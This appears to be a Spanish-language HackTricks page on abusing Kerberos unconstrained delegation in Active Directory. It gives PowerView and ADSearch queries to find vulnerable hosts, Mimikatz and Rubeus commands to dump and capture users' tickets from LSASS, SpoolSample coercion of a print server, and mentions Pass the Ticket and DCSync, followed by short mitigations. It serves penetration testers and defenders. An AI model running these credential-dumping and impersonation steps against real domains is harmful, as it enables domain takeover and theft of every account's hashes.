5.3 KiB
Delegación sin restricciones
Esta es una característica que un administrador de dominio puede establecer en cualquier computadora dentro del dominio. Entonces, cada vez que un usuario inicia sesión en la computadora, se enviará una copia del TGT de ese usuario dentro del TGS proporcionado por el DC y se guardará en la memoria en LSASS. Por lo tanto, si tiene privilegios de administrador en la máquina, podrá volcar los tickets e impersonar a los usuarios en cualquier máquina.
Por lo tanto, si un administrador de dominio inicia sesión en una computadora con la función de "Delegación sin restricciones" activada, y tiene privilegios de administrador local dentro de esa máquina, podrá volcar el ticket e impersonar al administrador de dominio en cualquier lugar (escalada de privilegios de dominio).
Puede encontrar objetos de computadora con este atributo verificando si el atributo userAccountControl contiene ADS_UF_TRUSTED_FOR_DELEGATION. Puede hacer esto con un filtro LDAP de '(userAccountControl:1.2.840.113556.1.4.803:=524288)', que es lo que hace powerview:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTsCargue el ticket de Administrador (o usuario víctima) en la memoria con Mimikatz o Rubeus para un Pass the Ticket.
Más información: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Más información sobre la delegación sin restricciones en ired.team.
Forzar autenticación
Si un atacante es capaz de comprometer una computadora permitida para "Delegación sin restricciones", podría engañar a un servidor de impresión para que inicie sesión automáticamente contra ella guardando un TGT en la memoria del servidor.
Luego, el atacante podría realizar un ataque Pass the Ticket para impersonar la cuenta de usuario del servidor de impresión.
Para hacer que un servidor de impresión inicie sesión contra cualquier máquina, puede usar SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Si el TGT es de un controlador de dominio, se podría realizar un ataque de DCSync y obtener todas las hashes del DC.
Más información sobre este ataque en ired.team.
Aquí hay otras formas de intentar forzar una autenticación:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Mitigación
- Limitar los inicios de sesión de DA/Admin a servicios específicos.
- Establecer "La cuenta es sensible y no se puede delegar" para las cuentas privilegiadas.
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el swag oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PR al repositorio de hacktricks y al repositorio de hacktricks-cloud.